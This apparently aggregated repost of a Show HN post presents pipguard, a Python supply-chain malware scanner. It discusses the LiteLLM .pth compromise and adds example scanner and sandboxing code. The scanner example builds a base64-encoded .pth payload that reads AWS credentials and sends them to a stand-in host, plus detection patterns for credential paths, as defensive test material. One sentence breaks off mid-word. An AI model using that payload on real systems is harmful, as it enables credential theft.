Show HN: Pipguard – Pre-install malware scanner for Python supply-chain attacks

hackernews | 📦 Open source
#ai deals #anthropic #claude #cli #openai #pip #python #supply-chain attack #security
Original source: hackernews · Summarized and analyzed by Genesis Park

Summary

'pipguard', developed by AtomsAI, is a local security CLI tool that defends against supply-chain attacks by scanning Python packages for malware before they are installed. It detects more than ten threat patterns, such as executable startup files and credential theft, and automatically blocks the install when malicious code is found. It also limits the impact of a security incident with a 'doctor' command that checks the current environment for signs of compromise (and 'env-audit' for exposed credentials) and a 'run' command that launches external tools with a minimal, scrubbed environment.

Body

Scan Python packages for supply-chain malware before install. Reduce blast radius when running untrusted tools.

pipguard is a local-only, zero-dependency Python CLI that catches obvious supply-chain attacks (executable .pth files, import-time exfiltration, credential harvesting, obfuscated payloads) before they reach your environment. Maintained and managed by AtomsAI.com (x.com/ai_atoms).

Recent supply-chain incidents (PyPI typosquatting, compromised maintainer accounts, malicious startup hooks) have shown that `pip install` is an implicit trust decision. pipguard adds a verification step between download and install, and provides tools to audit and contain blast radius in your development environment.

Why pre-install scanning matters: LiteLLM 1.82.8

The LiteLLM PyPI release 1.82.8 became a high-visibility example of why pre-install package scanning matters. The reported behavior was not a dependency-hygiene issue or a known CVE; it was a live supply-chain compromise pattern: startup-hook execution, credential discovery, and outbound data theft. Community reports described the release as containing a malicious litellm_init.pth startup hook with base64-encoded instructions designed to collect credentials and exfiltrate them to a remote server.

"LiteLLM HAS BEEN COMPROMISED, DO NOT UPDATE. We just discovered that LiteLLM pypi release 1.82.8. It has been compromised, it contains litellm_init.pth with base64 encoded instructions to send all the credentials it can find to remote server + self-replicate." Source: Daniel Hnyk (tweet)

Why this matters:
- .pth files in site-packages are processed by site.py at interpreter startup, and any line that begins with `import` is executed, so the damage is done before a developer notices anything unusual.
- Credential theft targets the exact materials most AI and infra-heavy Python environments carry: API keys, cloud credentials, SSH material, shell history, and cluster configuration.
- A compromised package can affect both install-time trust and runtime blast radius, which is why pipguard includes both package scanning and environment containment commands.

Public discussion and incident context:
- Daniel Hnyk warning about the compromised LiteLLM 1.82.8 release: x.com/hnykda/status/2036414330267193815
- Broader public discussion from Andrej Karpathy: x.com/karpathy/status/2036487306585268612

pipguard is designed specifically for this class of attack: suspicious startup hooks, obfuscated payloads, environment enumeration, sensitive path reads, IOC matches, and source-to-sink exfiltration chains.

Commands

| Command | Purpose |
|---|---|
| pipguard scan | Scan a wheel, sdist, or directory for malware patterns |
| pipguard install | Download → scan → install (blocks if malicious) |
| pipguard doctor | Inspect your current Python environment for compromise |
| pipguard env-audit | Show credential exposure in your current shell |
| pipguard run -- | Launch a command with a scrubbed environment |

Installation

From a checkout of the repository, for development:

```bash
python3 -m pip install -e ".[dev]"
```

One-line runner options:

```bash
uvx --from git+https://github.com/atomsai/pipguard.git pipguard --help
pipx install git+https://github.com/atomsai/pipguard.git
pipguard --help
```

Or just clone and run directly:

```bash
git clone https://github.com/AtomsAI/pipguard.git
cd pipguard
python3 -m pipguard --help
```

macOS note: many systems do not provide `python` by default. Prefer `python3` in commands.
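The attack class described above (an executable .pth hook that decodes a base64 blob, reads credential files and sends them out) can be caught with a handful of file-level rules. The following is an added example written for this page, not pipguard's own scanner or rule set: it opens a wheel, flags any .pth line that site.py would pass to exec(), decodes long base64 runs so obfuscated content is checked with the same rules as plain text, and reports a source-to-sink chain when a sensitive path and a network call appear in the same unit. The regexes, severities, the in-memory wheel and the sample payload (pointed at a reserved .invalid host, never executed) are all constructed for the example; sdists are not handled.

```python
"""Added example (not pipguard's own scanner or rule set): look inside a wheel
for an executable .pth startup hook, a base64-obfuscated payload, credential
path reads and a source-to-sink exfiltration chain.

site.py processes every .pth file in site-packages at interpreter startup:
ordinary lines are appended to sys.path, but a line that starts with "import"
followed by a space or tab is passed to exec(). That is the hook abused here."""
import base64
import binascii
import io
import re
import zipfile

# Heuristic indicators constructed for this example.
PTH_EXEC_RE = re.compile(r"^import[ \t]")  # mirrors site.py's startswith check
OBFUSCATION_RE = re.compile(r"\b(?:exec|eval|compile)\s*\(|base64\.b64decode|codecs\.decode|__import__\s*\(")
SENSITIVE_PATH_RE = re.compile(r"\.aws/credentials|\.ssh/|\.bash_history|\.kube/config|\.netrc|\.docker/config\.json")
NETWORK_SINK_RE = re.compile(r"urllib\.request|requests\.(?:post|get|put)|http\.client|socket\.socket")
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
SEVERITY = {"medium": 1, "high": 2, "critical": 3}


def decoded_b64_blobs(text):
    """UTF-8 text of every long base64 run in text that decodes cleanly."""
    out = []
    for blob in B64_BLOB_RE.findall(text):
        if len(blob) % 4:
            continue
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "ignore"))
        except (binascii.Error, ValueError):
            continue
    return out


def scan_wheel(wheel):
    """Scan a wheel (path or file object); return findings, most severe first."""
    findings = {}  # (rule, member) -> finding: each rule fires once per member

    def hit(severity, rule, member, detail):
        findings.setdefault((rule, member),
                            {"severity": severity, "rule": rule, "member": member, "detail": detail})

    with zipfile.ZipFile(wheel) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            try:
                text = zf.read(info.filename).decode("utf-8")
            except UnicodeDecodeError:
                continue  # binary member: a fuller scanner would hash it against IOC lists
            member = info.filename
            if member.endswith(".pth"):
                for lineno, line in enumerate(text.splitlines(), 1):
                    if PTH_EXEC_RE.match(line):
                        hit("high", "executable-pth", member, f"line {lineno}: {line[:60]}")
            # Run the same rules over the raw text and over every decoded base64 blob,
            # so a payload hidden behind b64decode(...) does not escape them.
            for view in [text] + decoded_b64_blobs(text):
                if OBFUSCATION_RE.search(view):
                    hit("medium", "obfuscation", member, "exec/eval or decode of embedded data")
                path = SENSITIVE_PATH_RE.search(view)
                if path:
                    hit("high", "sensitive-path", member, f"references {path.group(0)}")
                    if NETWORK_SINK_RE.search(view):
                        hit("critical", "exfil-chain", member,
                            f"{path.group(0)} read and a network sink in the same unit")
    return sorted(findings.values(), key=lambda f: -SEVERITY[f["severity"]])


def verdict(findings):
    """Block-on-malicious policy: any high or critical finding stops the install."""
    return "block" if any(SEVERITY[f["severity"]] >= 2 for f in findings) else "allow"


def build_sample_wheel(pth_text):
    """Constructed in-memory wheel carrying one .pth file, for exercising the scanner."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("pkg/__init__.py", "VERSION = '1.0'\n")
        zf.writestr("pkg-1.0.dist-info/METADATA", "Name: pkg\nVersion: 1.0\n")
        zf.writestr("pkg_init.pth", pth_text)
    buf.seek(0)
    return buf


# Constructed stand-in for a credential-stealing hook; the host is a reserved
# .invalid name and nothing below is ever executed, only scanned.
_PAYLOAD = ("import os, urllib.request\n"
            "p = os.path.expanduser('~/.aws/credentials')\n"
            "d = open(p).read() if os.path.exists(p) else ''\n"
            "urllib.request.urlopen('http://collector.example.invalid/c', d.encode())\n")
MALICIOUS_PTH = 'import base64,sys;exec(base64.b64decode("%s"))\n' % base64.b64encode(_PAYLOAD.encode()).decode()
BENIGN_PTH = "pkg\n"  # an ordinary .pth line: a path appended to sys.path, nothing executed

if __name__ == "__main__":
    for label, pth in (("malicious", MALICIOUS_PTH), ("benign", BENIGN_PTH)):
        found = scan_wheel(build_sample_wheel(pth))
        print(label, verdict(found), [(f["severity"], f["rule"]) for f in found])
```

One caveat a practitioner should keep in mind: editable installs and setuptools' own `distutils-precedence.pth` legitimately start lines with `import`, so an `executable-pth` finding is a reason to read the file, not proof of compromise on its own. The `exfil-chain` rule, which needs a credential-path reference and a network sink in the same unit, is the higher-confidence signal.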
Usage examples

```bash
pipguard scan ./downloaded-package/
pipguard scan package-1.0-py3-none-any.whl
pipguard install requests
pipguard install "litellm==4.97.1" --policy block
pipguard install some-package --json-out report.json
pipguard doctor
pipguard doctor --ioc litellm-march-2026
pipguard doctor --json-out doctor-report.json
pipguard env-audit
pipguard env-audit --json-out audit.json
```

Running tools with a scrubbed environment:

```bash
# Default: only PATH, HOME, LANG, TERM inherited
pipguard run -- python3 my_script.py
# Allow specific env vars
pipguard run --allow-env OPENAI_API_KEY -- python3 agent.py
# Use a named profile
pipguard run --profile claude-code -- claude
# See what would be inherited/blocked
pipguard run --dry-run -- node server.js
# Strict mode (only PATH and HOME)
pipguard run --strict --allow-env ANTHROPIC_API_KEY -- python3 agent.py
```

Quick reference

```bash
# Pre-install scan (local artifact or folder)
pipguard scan ./dist/pkg-1.0.0-py3-none-any.whl
# Safe install wrapper (download -> scan -> local-only install)
pipguard install "requests>=2.31"
# Incident triage in current environment
pipguard doctor --ioc litellm-march-2026
# Exposure audit of current shell
pipguard env-audit
# Run tool with minimal env inheritance
pipguard run --allow-env OPENAI_API_KEY -- python3 app.py
# Dry-run to preview inherited vs blocked vars
pipguard run --profile mcp-server --dry-run -- my_mcp_server
```

Removing pipguard

```bash
# If installed with pip:
python3 -m pip uninstall pipguard
# If installed with pipx:
pipx uninstall pipguard
# If used via uvx (ephemeral), no uninstall is required.
```

- Install pipguard outside project virtualenvs (prefer pipx or uvx) so dependency code in a project env cannot directly uninstall it.
- Run uninstall commands only from a trusted interactive shell, never from package-provid
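To make the `run` semantics in the usage examples concrete (a default inherit set, `--allow-env`, `--profile`, `--strict`, `--dry-run`), here is an added example that is not pipguard's code: a default-deny allowlist planner that returns what a child process would inherit and what is blocked, a dry-run view that labels secret-looking names, and a launcher that hands the child only the planned variables through `subprocess.run(env=...)`. The default and strict sets follow the comments in the commands above; the profile contents, the secret-name heuristic and the sample shell environment are assumptions made for this example.

```python
"""Added example, not pipguard's code: plan and apply a default-deny environment
for an untrusted child process, mirroring the `pipguard run` options shown above.
Profile contents and the secret-name heuristic are assumptions for this example."""
import os
import re
import subprocess

DEFAULT_INHERIT = ("PATH", "HOME", "LANG", "TERM")  # default set named in the usage comments
STRICT_INHERIT = ("PATH", "HOME")                   # --strict set named in the usage comments

# Hypothetical named profiles; the real profile contents are not on the page.
PROFILES = {
    "claude-code": ("ANTHROPIC_API_KEY",),
    "mcp-server": ("OPENAI_API_KEY", "LOG_LEVEL"),
}
# Names that usually carry secrets; used only to label blocked vars in the dry-run view.
SECRET_NAME_RE = re.compile(r"KEY|TOKEN|SECRET|PASSW|CREDENTIAL|AUTH", re.IGNORECASE)


def plan_environment(parent_env, allow_env=(), profile=None, strict=False):
    """Split parent_env into (inherited, blocked) under a default-deny allowlist.

    Nothing reaches the child unless it is in the base set, in --allow-env, or in
    the chosen profile. An unknown profile name is an error rather than a silent
    fallback to the defaults."""
    if profile is not None and profile not in PROFILES:
        raise ValueError(f"unknown profile: {profile}")
    allowed = set(STRICT_INHERIT if strict else DEFAULT_INHERIT)
    allowed.update(allow_env)
    allowed.update(PROFILES.get(profile, ()))
    inherited = {k: v for k, v in parent_env.items() if k in allowed}
    blocked = {k: v for k, v in parent_env.items() if k not in allowed}
    return inherited, blocked


def dry_run_report(parent_env, **options):
    """Lines a --dry-run style preview would print: inherited names first, then
    blocked names with secret-looking ones called out. Values are never printed."""
    inherited, blocked = plan_environment(parent_env, **options)
    lines = [f"inherit      {name}" for name in sorted(inherited)]
    for name in sorted(blocked):
        tag = "block/secret" if SECRET_NAME_RE.search(name) else "block       "
        lines.append(f"{tag} {name}")
    return lines


def run_scrubbed(cmd, allow_env=(), profile=None, strict=False, parent_env=None):
    """Launch cmd with only the planned variables. Passing env= replaces the whole
    environment; unsetting variables one at a time would leave anything unlisted."""
    parent = os.environ if parent_env is None else parent_env
    inherited, _ = plan_environment(parent, allow_env, profile, strict)
    return subprocess.run(cmd, env=inherited, check=False)


if __name__ == "__main__":
    # Constructed parent environment standing in for a developer's shell.
    shell = {"PATH": "/usr/bin:/bin", "HOME": "/home/dev", "LANG": "C.UTF-8", "TERM": "xterm",
             "OPENAI_API_KEY": "sk-constructed", "AWS_SECRET_ACCESS_KEY": "constructed",
             "SSH_AUTH_SOCK": "/tmp/agent.sock", "EDITOR": "vi"}
    print("\n".join(dry_run_report(shell, profile="mcp-server")))
```

The design point is that the allowlist is applied by replacing the environment wholesale rather than by deleting known-bad names: a deny-list approach misses any variable nobody thought to list, such as an agent socket or a cloud SDK's ambient token, whereas the child here cannot see anything the planner did not put in `inherited`.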

This analysis was written by the Genesis Park editorial team with the help of AI. The original can be checked via the source link.
